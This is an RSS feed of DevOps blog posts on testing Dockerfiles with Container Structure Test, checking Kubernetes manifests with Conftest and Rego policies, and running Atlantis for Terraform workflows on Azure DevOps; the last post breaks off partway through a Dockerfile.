<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[John Reese]]></title><description><![CDATA[Go . Kubernetes . DevOps]]></description><link>https://reese.dev/</link><generator>Ghost 2.0</generator><lastBuildDate>Thu, 09 Apr 2026 13:33:06 GMT</lastBuildDate><atom:link href="https://reese.dev/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[Testing Containers with Container Structure Test]]></title><description><![CDATA[<p><img src="https://reese.dev/content/images/2020/09/containers.jpg" alt="containers"></p>
<p>It is no secret that when we are writing software, tests are a critical component to ensure the code <em>actually</em> does what we say it does. It is so critical that most languages come with testing frameworks. JavaScript has testing frameworks such as <a href="https://mochajs.org/">mocha</a> and <a href="https://jasmine.github.io/">jasmine</a>. Go ships with its</p>]]></description><link>https://reese.dev/testing-containers-with-container-structure-test/</link><guid isPermaLink="false">5f663f69fdd9cb45ead965c2</guid><category><![CDATA[testing]]></category><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Sat, 06 Jun 2020 17:27:00 GMT</pubDate><media:content url="https://reese.dev/content/images/2020/09/containers.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://reese.dev/content/images/2020/09/containers.jpg" alt="Testing Containers with Container Structure Test"><p><img src="https://reese.dev/content/images/2020/09/containers.jpg" alt="Testing Containers with Container Structure Test"></p>
<p>It is no secret that when we are writing software, tests are a critical component to ensure the code <em>actually</em> does what we say it does. It is so critical that most languages come with testing frameworks. JavaScript has testing frameworks such as <a href="https://mochajs.org/">mocha</a> and <a href="https://jasmine.github.io/">jasmine</a>. Go ships with its own testing capabilities provided by the <a href="https://golang.org/pkg/testing/">testing package</a>. And while writing tests in these languages is an accepted standard practice, all too often we forget that there is more to getting an application onto production than the app itself.</p>
<p><a href="https://docs.docker.com/engine/reference/builder/">Dockerfiles</a> play a big part in how we ship software at my company. We use them heavily in our build pipelines to run <a href="https://docs.microsoft.com/en-us/azure/devops/pipelines/process/container-phases?view=azure-devops">containerized jobs</a> as well as the distribution mechanism to get the software onto our Kubernetes clusters.  We like to say, &quot;If it's code, we can test it,&quot; and that is no exception when it comes to writing <code>Dockerfiles</code>.</p>
<h2 id="atraditionalapproachtowritingdockerfiles">A traditional approach to writing Dockerfiles</h2>
<p>When tasked with writing a <code>Dockerfile</code>, there are defined requirements that the <code>Dockerfile</code> needs to satisfy. Binaries may be required to run linting tools, environment variables need to be set, and files have to exist at specific paths. Consider the <code>Dockerfile</code> that was shown in an earlier blog post, <a href="https://reese.dev/testing-containers-with-container-structure-test/../deploying-atlantis-to-kubernetes-with-azure-devops">Deploying Atlantis to Kubernetes with Azure DevOps</a>:</p>
<pre><code class="language-Dockerfile">FROM golang:1.13 as builder
RUN apt-get update \
  &amp;&amp; apt-get install unzip

# Install terraform-bundle
RUN git clone \
  --depth 1 \
  --single-branch \
  --branch &quot;v0.12.0&quot; \
  https://github.com/hashicorp/terraform.git \
  $GOPATH/src/github.com/hashicorp/terraform
RUN cd $GOPATH/src/github.com/hashicorp/terraform \
  &amp;&amp; go install ./tools/terraform-bundle

# Download plugins
COPY terraform-bundle.hcl .
RUN terraform-bundle package -os=linux -arch=amd64 terraform-bundle.hcl
RUN mkdir /go/tmp \
  &amp;&amp; unzip /go/terraform_*-bundle*_linux_amd64.zip -d /go/tmp

FROM runatlantis/atlantis:v0.11.1
ENV TF_IN_AUTOMATION=&quot;true&quot;
ENV TF_CLI_ARGS_init=&quot;-plugin-dir=/home/atlantis/.atlantis/plugin-cache&quot;

# Install Azure CLI
ARG AZURE_CLI_VERSION=&quot;2.0.74&quot;
RUN apk add py-pip \
  &amp;&amp; apk add --virtual=build gcc libffi-dev musl-dev openssl-dev python-dev make
RUN pip --no-cache-dir install azure-cli==${AZURE_CLI_VERSION}

# Install Terragrunt
ARG TERRAGRUNT_VERSION=&quot;v0.23.2&quot;
RUN curl -L https://github.com/gruntwork-io/terragrunt/releases/download/${TERRAGRUNT_VERSION}/terragrunt_linux_amd64 \
  &amp;&amp; -o /usr/local/bin/terragrunt \
  &amp;&amp; chmod +x /usr/local/bin/terragrunt
  
# Copy plugins
COPY .terraformrc /root/.terraformrc
COPY --chown=atlantis:atlantis --from=builder /go/tmp /home/atlantis/.atlantis/plugin-cache
RUN mv /home/atlantis/.atlantis/plugin-cache/terraform /usr/local/bin/terraform

# Configure git
COPY .gitconfig /home/atlantis/.gitconfig
COPY azure-devops-helper.sh /home/atlantis/azure-devops-helper.sh

# Copy server-side repository config
COPY repository-config.yaml /home/atlantis/repository-config.yaml

CMD [&quot;server&quot;, &quot;--repo-config=/home/atlantis/repository-config.yaml&quot;]

LABEL org.opencontainers.image.title=&quot;Atlantis Environment&quot;
LABEL org.opencontainers.image.description=&quot;An environment to support executing Terragrunt operations with Atlantis&quot;

LABEL binary.atlantis.version=&quot;v0.11.1&quot;
LABEL binary.terragrunt.version=${TERRAGRUNT_VERSION}
LABEL binary.azure-cli.version=${AZURE_CLI_VERSION}
</code></pre>
<p>This <code>Dockerfile</code> requires:</p>
<ul>
<li>Terraform plugins to support different types of infrastructure.</li>
<li>The Terragrunt CLI.</li>
<li>Two environment variables, <code>TF_IN_AUTOMATION</code> and <code>TF_CLI_ARGS_init</code>.</li>
<li>Git configuration that points to an Azure DevOps helper script (and the script itself).</li>
<li>A global configuration for repositories that use Atlantis.</li>
</ul>
<p>To begin writing this <code>Dockerfile</code>, knowing that we'll need to install <a href="https://github.com/hashicorp/terraform/tree/master/tools/terraform-bundle">terraform-bundle</a> (using Go), as well as install the <code>unzip</code> package to unzip the generated bundle, we could jump right into it and create a <code>Dockerfile</code>:</p>
<pre><code class="language-Dockerfile">FROM golang:1.13 as builder
RUN apt-get update \
  &amp;&amp; apt-get install unzip
</code></pre>
<p>To verify that the base image exists and that the unzip package was successfully installed, we execute the <code>docker run</code> command with an interactive terminal to explore the contents of the produced container.</p>
<pre><code class="language-shell">$ docker build . -t testing:latest
$ docker run -it testing:latest
root@fb06cc45835c:/go# unzip
UnZip 6.00 of 20 April 2009, by Debian. Original by Info-ZIP.
</code></pre>
<p>We know the <code>unzip</code> package successfully installed because after executing the binary, we get a response back that includes the version of the binary and the date it was built.</p>
<p>If the <code>unzip</code> package did not install successfully, the container would throw an error stating that <code>unzip</code> is an unknown command.</p>
<pre><code class="language-shell">$ docker run -it testing:latest
root@fb06cc45835c:/go# unzip
bash: unzip: command not found
</code></pre>
<p>This cycle of adding commands into the <code>Dockerfile</code>, building the image, running the container, and exploring the structure of the container would need to continue until we met all of the requirements. While this process will allow us to satisfy all of the requirements, much of the verification is manual. Besides, when the requirements change, as they tend to do, it can be incredibly challenging to have confidence that we didn't inadvertently break anything else by introducing a change.</p>
<h2 id="abetterwayforwardwithcontainerstructuretest">A better way forward with Container Structure Test</h2>
<p><a href="https://github.com/GoogleContainerTools/container-structure-test">Container Structure Test</a> is a tool developed by Google that enables us to test the structure of a container. I'm not sure how they came up with the name, but what's important is that it removes the need to test <code>Dockerfiles</code> manually!</p>
<p>Container Structure Test supports four different types of tests: <code>command</code>, <code>file existence</code>, <code>file content</code>, and <code>metadata</code>. Each type of test can validate a different aspect of a container. It does this by running the container for you, automatically, and testing whether or not the structure of the container meets the defined requirements in the test file.</p>
<p><em>NOTE: If you would like a deeper dive into the internals of Container Structure Test, the folks over at Google put together a <a href="https://opensource.googleblog.com/2018/01/container-structure-tests-unit-tests.html">blog post</a> that explains the different types of tests in greater detail, as well as how to get the most out of the tool.</em></p>
<h2 id="writingadockerfile">Writing a Dockerfile</h2>
<p>When equipped with Container Structure Test, rather than creating a new <code>Dockerfile</code>, adding commands, building the container, running the container, and manually exploring the container—we define the requirements upfront.</p>
<p>In the previous example, the first known requirement was that the <code>unzip</code> package had to be present inside of the container. To define this requirement as a test case within Container Structure Test, we use a<code>command</code> test:</p>
<pre><code class="language-yaml">schemaVersion: 2.0.0

commandTests:
- name: unzip
  command: unzip
  args: [&quot;-v&quot;]
</code></pre>
<p>To test the <code>Dockerfile</code>, pass the name of the built image along with the location of the test file to the <code>container-structure-test</code> CLI.</p>
<p><em>NOTE: It's possible to save some keystrokes, as well as time, by combining the <code>docker build</code> and <code>container-structure-test test</code> commands so that every time the <code>Dockerfile</code> changes, a new image is built and the test suite is run against the most recently built image.</em></p>
<pre><code class="language-shell">$ docker build . -t testing:latest \
  &amp;&amp; container-structure-test test --image testing:latest --config unzip-test.yaml

===================================
============= RESULTS =============
===================================
Passes:      1
Failures:    0
Duration:    443.548204ms
Total tests: 1
</code></pre>
<p>While it's possible to create a single test and then pass the test inside of your <code>Dockerfile</code> (which is reminiscent of Test-Driven Development), another valid approach is to define <em>all</em> your requirements first and build the <code>Dockerfile</code> from the test suite. As either is acceptable, whichever method makes the most sense for your style is the one you should use!</p>
<p>To complete our example of writing a test suite for the Atlantis container image, this is the completed test suite.</p>
<pre><code class="language-yaml">schemaVersion: 2.0.0

# Validate the environment contains the required tooling
commandTests:
- name: Atlantis
  command: atlantis
  args: [&quot;version&quot;]

- name: Terraform
  command: terraform
  args: [&quot;version&quot;]
  expectedOutput: [&quot;Terraform v0.12.24&quot;]

- name: Terragrunt
  command: terragrunt
  args: [&quot;--version&quot;]

- name: Azure CLI
  command: az
  args: [&quot;--version&quot;]

# Validate the required configuration files exist
fileExistenceTests:
- name: Server Configuration
  path: /home/atlantis/repository-config.yaml
  shouldExist: true

- name: Azure DevOps Helper
  path: /home/atlantis/azure-devops-helper.sh
  shouldExist: true

- name: Terraform Plugin Cache
  path: /home/atlantis/.atlantis/plugin-cache
  shouldExist: true

# Validate checkpoint functionality is off
fileContentTests:
- name: Terraform Checkpoint Disabled 
  path: /home/atlantis/.terraformrc
  expectedContents: ['disable_checkpoint = true']

# Validate container environment is configured as expected
metadataTest:
  env:
    - key: TF_IN_AUTOMATION
      value: true
    - key: TF_CLI_ARGS_init
      value: -plugin-dir=/home/atlantis/.atlantis/plugin-cache
</code></pre>
<h2 id="integratingcontainerstructuretestintoyourworkflow">Integrating Container Structure Test into your workflow</h2>
<p>While using Container Structure Test for local development can save a lot of time when first writing the <code>Dockerfile</code>, the benefits don't stop there!</p>
<p>After creating the <code>Dockerfile</code>, we now have defined a set of requirements that the <code>Dockerfile</code> must adhere to. Having this set of requirements enables us to be able to run Container Structure Test at any point in the future and verify, automatically, that no regressions or unexpected changes occurred inside of the container. A software component that exists inside of a container image could change its version at any time, or even worse, be removed altogether. If you depend on specific components, and particular versions, add tests for them!</p>
<p>In the case of Atlantis, the maintainers are free to <a href="https://github.com/runatlantis/atlantis/commit/a9873aeb585c9e03e89c188feb9dd0e7086ebdf3">change the version of Terraform</a> inside of the container at any time during their release cycle. Updating from Atlantis <code>0.12</code> to <code>0.13</code> should be trivial, but because the version of Terraform used to deploy infrastructure <a href="https://github.com/hashicorp/terraform/issues/19290#issuecomment-436012086">needs to be taken into consideration</a>—we need to be made aware when the version changes.</p>
<pre><code class="language-yaml">schemaVersion: 2.0.0

- name: Terraform
  command: terraform
  args: [&quot;version&quot;]
  expectedOutput: [&quot;Terraform v0.12.21&quot;]
</code></pre>
<p>This <code>command test</code> will fail the test suite when the version of Terraform inside of the container changes from <code>v0.12.21</code>. Now, upgrading Atlantis is as simple as bumping the version and re-running the test suite.</p>
<p>Integrating Container Structure Test into your workflow for developing <code>Dockerfiles</code> automates much of the manual exploration that was previously required to verify the structure of the container. As a bonus, after the <code>Dockerfile</code> is first built, we have a test suite that we can run every time we need to make a change to the <code>Dockerfile</code> inside of our pipelines.</p>
]]></content:encoded></item><item><title><![CDATA[Accelerated Feedback Loops when Developing for Kubernetes with Conftest]]></title><description><![CDATA[<p><img src="https://reese.dev/content/images/2020/09/kubernetes-conftest.jpg" alt="kubernetes"></p>
<p>The feedback loop when deploying to Kubernetes can be quite slow. Not only does the YAML need to be syntactically correct, but we need to ask ourselves:</p>
<p>Is the API version of our resource definition compatible with the version of Kubernetes that it is being deployed to? Kubernetes is constantly</p>]]></description><link>https://reese.dev/accelerated-feedback-loops-when/</link><guid isPermaLink="false">5f664156fdd9cb45ead965c5</guid><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Sat, 23 May 2020 17:35:00 GMT</pubDate><media:content url="https://reese.dev/content/images/2020/09/kubernetes-conftest.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://reese.dev/content/images/2020/09/kubernetes-conftest.jpg" alt="Accelerated Feedback Loops when Developing for Kubernetes with Conftest"><p><img src="https://reese.dev/content/images/2020/09/kubernetes-conftest.jpg" alt="Accelerated Feedback Loops when Developing for Kubernetes with Conftest"></p>
<p>The feedback loop when deploying to Kubernetes can be quite slow. Not only does the YAML need to be syntactically correct, but we need to ask ourselves:</p>
<p>Is the API version of our resource definition compatible with the version of Kubernetes that it is being deployed to? Kubernetes is constantly evolving, and over time, <a href="https://kubernetes.io/docs/reference/using-api/deprecation-policy/#deprecating-parts-of-the-api">deprecates older APIs</a> in favor of newer ones. A deployment definition may successfully apply on one version of Kubernetes, but not another.</p>
<p>Are the resources that depend on one another configured properly? For example, when creating a <a href="https://kubernetes.io/docs/concepts/services-networking/service/">Service</a>, you can specify <a href="https://kubernetes.io/docs/concepts/overview/working-with-objects/labels/">selectors</a> for which Pods the traffic should ultimately be routed to. In the event that a Service is configured with selectors, but is unable to find any Pods, this mistake would not be known until the Service is deployed to the cluster. What makes this case even more challenging is that this configuration is technically valid but would require additional testing to verify if the traffic is flowing as expected.</p>
<p><a href="https://github.com/kubernetes-sigs/kind">Kind</a> aims to help solve a lot of these concerns by allowing developers to spin up a Kubernetes cluster on their local machine, verify their changes, and tear it down with ease. However, it can still take a fair amount of time to bring up a Kind cluster, apply the manifests, and test the outcome.</p>
<p>While these concerns can be caught relatively early, there are additional considerations, especially in the realm of security, that may not be immediately obvious and could go unnoticed until they become a <a href="https://unit42.paloaltonetworks.com/non-root-containers-kubernetes-cve-2019-11245-care/">serious problem</a>.</p>
<p>To catch a lot of these problems ahead of time without the need of a Kubernetes cluster, including Kind, it's possible to validate all deployments to Kubernetes against policies.</p>
<h2 id="anexamplepolicy">An example policy</h2>
<p>Most of the policies that I write, are written in <a href="https://www.openpolicyagent.org/docs/latest/policy-language/">Rego</a>, a policy language that is interpreted by the <a href="https://www.openpolicyagent.org/">Open Policy Agent</a> (OPA). To better understand Rego, and how we can leverage it to write policies for Kubernetes, consider the following scenario:</p>
<p>In our cluster, we want to be able to quickly identify which team owns a given Namespace. This can be useful for being able to notify teams about overutilization, cost reporting, problematic pods, and more. To accomplish this, we require that all namespaces must be created with an <code>owner</code> label.</p>
<p>To show how we can use Rego to validate Kubernetes manifests, let's create a namespace without an <code>owner</code> label:</p>
<pre><code class="language-yaml">apiVersion: v1
kind: Namespace
metadata:
  name: missinglabel
</code></pre>
<p>We'll also need a policy. A Rego policy to enforce this requirement would look like the following:</p>
<pre><code class="language-javascript">package main

violation[msg] {
  input.kind == &quot;Namespace&quot;
  not input.metadata.labels[&quot;owner&quot;]
  
  msg := &quot;All namespaces must contain an owner label&quot;
}
</code></pre>
<p><em>NOTE: The <code>input</code> prefix is special when writing policies. It refers to the input document which is one of the base documents provided by the OPA <a href="https://www.openpolicyagent.org/docs/latest/philosophy/#the-opa-document-model">document model</a>.</em></p>
<p>This policy defines a single <a href="https://www.openpolicyagent.org/docs/latest/policy-language/#rules">rule</a> called <code>violation</code>. While the order of the statements within the rule do not matter, it can be easier to understand how a rule is evaluated if expressed in this way.</p>
<p><strong>Line 04</strong> first evaluates if the input has a <code>kind</code> property and if its value is equal to Namespace. If the <code>kind</code> is not a Namespace, or there does not exist a <code>kind</code> property at all, the input will not be considered a violation. The example Namespace has both a <code>kind</code> property and has a value of &quot;Namespace&quot;, so the statement in the rule would return true.</p>
<p><strong>Line 05</strong> then checks to see if there exists a key named <code>owner</code> in the labels map within the manifests metadata. If there is a key named <code>owner</code>, then Namespace must have an owner label. In the example Namespace, there is not an <code>owner</code> label so this statement also returns true.</p>
<p><strong>Line 07</strong> is an assignment operation which will always return true by default.</p>
<p>After all of the statements have been evaluated, the rule itself can be evaluated. In order for a rule to be true, <em>all</em> of the statements inside of the rule must also be true. In this example, all of the statements returned true so the example Namespace would trigger the violation.</p>
<h2 id="validatingkubernetesmanifestswithconftest">Validating Kubernetes manifests with Conftest</h2>
<p>It is important to note that the Open Policy Agent always expects <em>JSON</em> in order to evaluate policies. Kubernetes on the other hand, speaks YAML. At its core, the Open Policy Agent is just a policy engine—it's intended to be generic and fit many use cases.</p>
<p><a href="https://github.com/open-policy-agent/conftest">Conftest</a> is a tool that focuses on the user experience when interacting with OPA. Most notably, it handles converting multiple file formats such as <code>.hcl</code>, <code>Dockerfile</code>, and even <code>yaml</code> into JSON so that it can be interpreted by OPA. Because Conftest is just a CLI that can be downloaded onto your machine, or even pipelines, it's possible to verify manifests against your policies before ever creating a pull request.</p>
<p>Here is an example of a policy that enforces resource constraints on all containers:</p>
<pre><code class="language-javascript">violation[msg] {
  container := input.spec.template.spec.containers[_]

  not container.resources.requests.cpu
  not container.resources.limits.cpu

  msg := sprintf(&quot;(%s): Container resource constraints must be specified.&quot;, [input.metadata.name])
}
</code></pre>
<p>If we were to run Conftest against the <a href="https://github.com/kubernetes/ingress-nginx/blob/master/deploy/static/provider/cloud/deploy.yaml">nginx ingress controller</a> bundle, we would see that it fails our policy:</p>
<pre><code class="language-shell">$ conftest test bundle.yaml

FAIL - (ingress-nginx): Container constraints must be specified.
</code></pre>
<p>We can then take the necessary steps to add the resource constraints into the Deployment so that our CI will allow the bundle onto our cluster.</p>
<h2 id="usingpolicybundles">Using policy bundles</h2>
<p>With Conftest, there's a lot of freedom in the ability to write our own policies, but there are a lot of <a href="https://www.conftest.dev/sharing/">bundles</a> that the community has written that we also leverage.</p>
<p>A policy bundle can be thought of as a collection of Rego policies that can be pulled from a remote source. A lot of best practices are generic enough that it wouldn't make sense for everyone to have to write and rewrite the same policies. While the concept of bundling and distributing Rego policies for Kubernetes is still quite new, there do exist a couple bundles that have provided immediate value to our pipelines.</p>
<h3 id="verifyapicompatibilitywithdeprek8ion">Verify API compatibility with Deprek8ion</h3>
<p><a href="https://github.com/swade1987/deprek8ion">Deprek8ion</a> is a set of Rego policies that can be used to see if any of our resources are currently, or will be, deprecated in a given Kubernetes release.</p>
<pre><code class="language-shell">$ conftest pull github.com/swade1987/deprek8ion/policies -p policy/deprek8ion
$ conftest test bundle.yaml

WARN - ingress-nginx-admission: API admissionregistration.k8s.io/v1beta1
is deprecated in Kubernetes 1.19, use admissionregistration.k8s.io/v1 instead.
</code></pre>
<h3 id="findsecurityconcernswithkubesec">Find security concerns with Kubesec</h3>
<p><a href="https://kubesec.io/">Kubesec</a> is a set of Rego policies that can be used to see if any of our resources have any insecure configurations.</p>
<pre><code class="language-shell">$ conftest pull github.com/instrumenta/policies/kubernetes -p policy/kubesec
$ conftest test bundle.yaml

FAIL - Deployment ingress-nginx-controller does not drop all capabilities
FAIL - Deployment ingress-nginx-controller is not using a read only root filesystem
FAIL - Deployment ingress-nginx-controller allows privileged escalation
FAIL - Deployment ingress-nginx-controller is running as root
</code></pre>
<p>Conftest enables us run policies against multiple resources at once—it is simple, yet powerful. No matter where the Kubernetes manifests originate from, in house or from the open, we can automatically execute our policies to validate that they're compliant with our requirements. This approach allows us to automate our standards and security compliant concerns, freeing up developers to focus on other tasks.</p>
<p>The general-purpose approach that the Open Policy Agent has taken, and the user experience that Conftest provides, enables near unlimited use cases for policy-based validation. While this post focuses a lot on validating Kubernetes manifests before deploying to a cluster, there are other possibilities as well. Notably continuous Kubernetes cluster auditing with <a href="https://github.com/open-policy-agent/gatekeeper">Gatekeeper</a>, and infrastructure security compliance with <a href="https://github.com/fugue/regula">Regula</a>.</p>
<p>Policy-based validation is still relatively new to the Kubernetes ecosystem, but it has already made a large impact on the community and I'm excited to see what's coming next in this space.</p>
]]></content:encoded></item><item><title><![CDATA[Deploying Atlantis to Kubernetes with Azure DevOps]]></title><description><![CDATA[<p><img src="https://reese.dev/content/images/2020/09/atlantis.jpg" alt="atlantis"></p>
<p>At my company, our initial adoption of <a href="https://www.terraform.io/">Terraform</a> was relatively painless. There weren't many teams writing infrastructure as code, and most of the changes that were being deployed through Terraform were new pieces of infrastructure that didn't have any dependencies.</p>
<p>As the number of teams using Terraform and managing their</p>]]></description><link>https://reese.dev/deploying-atlantis-to-kubernetes-with-azure-devops/</link><guid isPermaLink="false">5f6643e9fdd9cb45ead965c7</guid><category><![CDATA[azure]]></category><category><![CDATA[devops]]></category><category><![CDATA[tutorial]]></category><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Sun, 05 Apr 2020 17:45:00 GMT</pubDate><media:content url="https://reese.dev/content/images/2020/09/atlantis.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://reese.dev/content/images/2020/09/atlantis.jpg" alt="Deploying Atlantis to Kubernetes with Azure DevOps"><p><img src="https://reese.dev/content/images/2020/09/atlantis.jpg" alt="Deploying Atlantis to Kubernetes with Azure DevOps"></p>
<p>At my company, our initial adoption of <a href="https://www.terraform.io/">Terraform</a> was relatively painless. There weren't many teams writing infrastructure as code, and most of the changes that were being deployed through Terraform were new pieces of infrastructure that didn't have any dependencies.</p>
<p>As the number of teams using Terraform and managing their own infrastructure grew, it became apparent that we needed to start putting some processes in place for a few reasons.</p>
<h2 id="collaborationwasdifficult">Collaboration was difficult</h2>
<p>In order for an engineer to verify their Terraform changes, they needed to be able to run <code>terraform plan</code> against live infrastructure. In most cases, this was done locally on their computer. While this approach made it easy for the engineer to get feedback, it presented other problems.</p>
<p>First, to successfully run a plan against the existing infrastructure, the engineer needed to have read access to all of the resources that they were making changes to. While this seemed reasonable, it became a problem of scale. Anyone who wanted to be an effective contributor to the code base needed read permissions in Azure. This quickly spiraled out of control and made managing access more difficult.</p>
<p>Secondly, we require multiple approvers for every pull request. This meant that not only did the engineer creating the pull request have to run a <code>terraform plan</code> against their changes, but the reviewer of the code as well. This typically meant that the result of a plan was pasted into the pull request so that everyone could see how each resource would be impacted.</p>
<h2 id="problemswithdifferentterraformclients">Problems with different Terraform clients</h2>
<p>Not all engineers have the same Terraform client installed on their computer. This can cause problems when working on the same backing Terraform state.</p>
<p>When executing a <code>terraform refresh</code> or <code>terraform apply</code> against the current state, the version of Terraform that was used is stored in the state file. Attempting to execute Terraform commands with an older Terraform client than what is listed in the state file will result in an error similar to the following:</p>
<pre><code class="language-text">Terraform doesn't allow running any operations against a state
that was written by a future Terraform version. The state is
reporting it is written by Terraform '0.12.0'
</code></pre>
<p>It's important to note that newer Terraform clients can change the syntax of the state file and how the results should be interpreted. Unfortunately, older Terraform clients will not know how to process this newer information and will need to be updated.</p>
<p>This means that if an engineer has Terraform <code>0.12.1</code> on their machine and executes a <code>refresh</code> or <code>apply</code>, the state will be updated to include version <code>0.12.1</code> and everyone will need to upgrade their clients.</p>
<h2 id="planswentstale">Plans went stale</h2>
<p>Unfortunately, infrastructure can change at a moment's notice. Especially when multiple contributors are working on the same infrastructure. Consider the following scenario:</p>
<p>An engineer opens a pull request against a Terraform module and views the resulting plan. This plan highlights which resources will be created, destroyed, and/or updated. The plan looks good, but they decide to hold off on deploying the change because it's a Friday. Give that engineer a gold star!</p>
<p>Monday morning rolls around, and another engineer opens a pull request against the same module. Nothing seems out of the ordinary in the plan, so they apply the plan to production.</p>
<p>Now unfortunately for the first engineer in our scenario, their plan is no longer current.</p>
<p>At this point the original plan has lost most, if not all value. Worst yet, if the original developer is unaware of the newly introduced change, an apply to production could cause problems. Lots of problems.</p>
<h2 id="thehomegrownsolution">The homegrown solution</h2>
<p>To address these problems, we wrote two PowerShell scripts (one for plan and one for apply) that would be executed on our build agents in Azure. These were wired up as policy checks in the repository, allowing us to run them on-demand or automatically with Azure <a href="https://docs.microsoft.com/en-us/azure/devops/service-hooks/services/webhooks?view=azure-devops">webhooks</a>.</p>
<p>When a pull request was created, the plan script would execute <code>terraform plan</code> against the changes and output the results of the plan to the pull request comment thread. This enabled reviewers to see the actual changes that were being introduced, without having to run the plan locally themselves. Awesome! Our first problem was solved.</p>
<p>Then, if the plan looked good and the appropriate reviewers approved the change, another script would handle the <code>terraform apply</code> step.</p>
<p>To solve the issue of stale plans, we added a policy that for a <code>terraform apply</code> to be executed, an associated plan needed to be run at least 30 minutes prior. It wasn't ideal, but shortened the window of failure and gave us enough confidence that the original plan was still valid.</p>
<p>This approach worked well for us in the beginning, but as the amount of managed infrastructure, and the number of teams using the solution grew, we started noticing gaps.</p>
<p>Rather than continuing to invest in our homegrown solution, we set out to find an alternative. If the title of the blog didn't already give it away, that solution was Atlantis.</p>
<h2 id="atlantis">Atlantis</h2>
<p><a href="https://www.runatlantis.io/">Atlantis</a> is a pull request automation tool that makes it easier for teams to manage and deploy their infrastructure.</p>
<p>Conveniently, it addresses the problems that we have already discussed:</p>
<ul>
<li>Visual <code>plan</code> and <code>apply</code> results in the pull request? <em>Check.</em></li>
<li>Each repository can set the required version of Terraform? <em>Check.</em></li>
<li>State locking to guarantee that plans stay relevant? <em>Check.</em></li>
</ul>
<p>Best of all, not only does it run on Kubernetes, it's an <a href="https://github.com/runatlantis/atlantis">open source project</a>!</p>
<h3 id="howitworks">How it works</h3>
<p>Atlantis is controlled by typing commands as comments on the pull request comment thread. Need to run <code>plan</code> against your pull request? Just comment on the pull request: <code>atlantis plan</code>. This will instruct Atlantis to get the plan for your changes and respond to the pull request with the result.</p>
<p>To get the plan, Atlantis will:</p>
<ol>
<li>
<p>Clone the repository to its data drive. If you're running Atlantis on Kubernetes, this will either be a local drive within the container (using a Deployment) or a Persistent Volume Claim (using a StatefulSet).</p>
</li>
<li>
<p>Lock the folder containing the changes and store the lock metadata to its data drive. This prevents plans from getting stale and prevents conflicts from multiple contributors.</p>
</li>
<li>
<p>Execute <code>terraform plan</code> against the folder containing the change.</p>
</li>
<li>
<p>Report the plan result as a comment in the pull request.</p>
</li>
</ol>
<p>With this approach, engineers no longer need to have access to the managed infrastructure. All plan and apply operations are handled within the pull request.</p>
<p>As a bonus, Atlantis also supports webhooks, which enable actions to be performed automatically, such as when a pull request is opened or the code within the pull request is modified.</p>
<h2 id="rollingoutatlantis">Rolling out Atlantis</h2>
<p>One of the first decision points during our roll-out of Atlantis was: <em>How are we going to host this?</em>. Given that Atlantis runs inside of a Docker container, we had several options in front of us. Should we stand up an <a href="https://docs.microsoft.com/en-us/azure/container-instances/">Azure Container Instance</a>? Kubernetes? <em>Spolier alert, it's probably Kubernetes.</em></p>
<p>Regardless of the final home for Atlantis, there are some preliminary steps that we had to complete.</p>
<h3 id="1createtheatlantisuser">1. Create the Atlantis user</h3>
<p>Atlantis will need to use a user account that will be responsible for cloning the repositories and responding to pull requests. We decided to create a user named <code>atlantis</code>. <em>Completely original, I know.</em></p>
<p>We also created a Personal Access Token (PAT) for this user with the minimum scope possible:</p>
<ul>
<li><code>Code (Read &amp; Write)</code></li>
<li><code>Code (Status)</code></li>
</ul>
<h3 id="2configureatlantisforterragrunt">2. Configure Atlantis for Terragrunt</h3>
<p>We use <a href="https://github.com/gruntwork-io/terragrunt">Terragrunt</a> in our infrastructure repositories to help keep our infrastructure codebases DRY. Unfortunately, Atlantis does not support Terragrunt workflows out of the box and only provides a default workflow which excutes basic Terraform commands.</p>
<p>However, Atlantis allows you to create your own workflows if you provide a <a href="https://www.runatlantis.io/docs/server-side-repo-config.html">server side repository configuration</a>. This enabled us to extend Atlantis and run <code>terragrunt</code> commands.</p>
<pre><code class="language-yaml">repos:
# The list of repositories Atlantis watches. Supports wildcards/*
- id: dev.azure.com/org/project/first-repo

  # Only allow &quot;apply&quot; comments if the PR is approved and can be merged
  apply_requirements: [approved, mergeable]
  workflow: terragrunt

# Instead of terraform commands, run these for plan and apply
workflows:
  terragrunt:
    plan:
      steps:
      - run: terragrunt init -input=false -no-color
      - run: terragrunt plan -input=false -no-color -out $PLANFILE
    apply:
      steps:
      - run: terragrunt apply -input=false -no-color $PLANFILE
</code></pre>
<h3 id="3customizetheatlantisimage">3. Customize the Atlantis image</h3>
<p>We <a href="https://en.wikipedia.org/wiki/Air_gap_(networking)">air gap</a> our infrastructure pipelines, so it's not possible to download plugins on demand. Instead, we leverage Terraform's plugin cache and download the plugins ahead of time.</p>
<p>To accomplish this, we wrote our own custom <code>Dockerfile</code> that was based off of the original Atlantis image:</p>
<pre><code class="language-Dockerfile">FROM golang:1.13 as builder
RUN apt-get update \
  &amp;&amp; apt-get install unzip

# Install terraform-bundle
RUN git clone \
  --depth 1 \
  --single-branch \
  --branch &quot;v0.12.0&quot; \
  https://github.com/hashicorp/terraform.git \
  $GOPATH/src/github.com/hashicorp/terraform
RUN cd $GOPATH/src/github.com/hashicorp/terraform \
  &amp;&amp; go install ./tools/terraform-bundle

# Download plugins
COPY terraform-bundle.hcl .
RUN terraform-bundle package -os=linux -arch=amd64 terraform-bundle.hcl
RUN mkdir /go/tmp \
  &amp;&amp; unzip /go/terraform_*-bundle*_linux_amd64.zip -d /go/tmp

FROM runatlantis/atlantis:v0.11.1
ENV TF_IN_AUTOMATION=&quot;true&quot;
ENV TF_CLI_ARGS_init=&quot;-plugin-dir=/home/atlantis/.atlantis/plugin-cache&quot;

# Install Azure CLI
ARG AZURE_CLI_VERSION=&quot;2.0.74&quot;
RUN apk add py-pip \
  &amp;&amp; apk add --virtual=build gcc libffi-dev musl-dev openssl-dev python-dev make
RUN pip --no-cache-dir install azure-cli==${AZURE_CLI_VERSION}

# Install Terragrunt
